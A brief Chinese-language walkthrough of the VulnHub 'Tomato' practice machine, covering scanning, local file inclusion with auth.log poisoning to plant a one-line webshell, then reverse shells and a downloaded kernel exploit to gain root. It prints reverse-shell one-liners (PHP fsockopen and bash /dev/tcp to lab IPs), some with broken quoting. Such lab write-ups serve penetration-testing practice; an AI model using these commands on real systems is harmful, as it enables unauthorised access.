vulnhub-tomato

环境下载tomato
端口扫描

80端口扫描：

依次对目录访问：


文件包含（LFI，RFI），读取敏感文件和getshell(这里看到骚知识了)
首先查看phpinfo信息，不可以远程文件包含。(这里想拿getshell)，别人帖子写了可以从ssh(/var/log/auth.log)日志文件下手。
开动

做着做着把环境搞坏了，想到了跟着别人步骤走吧（这里有坑，一句话木马写入系统越少越少，要不会有问题）。

反弹shell直接偷别人成果算了，
php -r '$sock=fsockopen(“192.168.1.128”,4444);exec("/bin/sh -i <&3 >&3 2>&3");
echo “bash -i >& /dev/tcp/192.168.198.170/8079 0>&1” -d |bash

git clone https://github.com/kkamagui/linux-kernel-exploits.git
下载对于的提权脚本
在kli上面给.sh权限

kali开启web服务

shell上面下载并运行，得到root权限。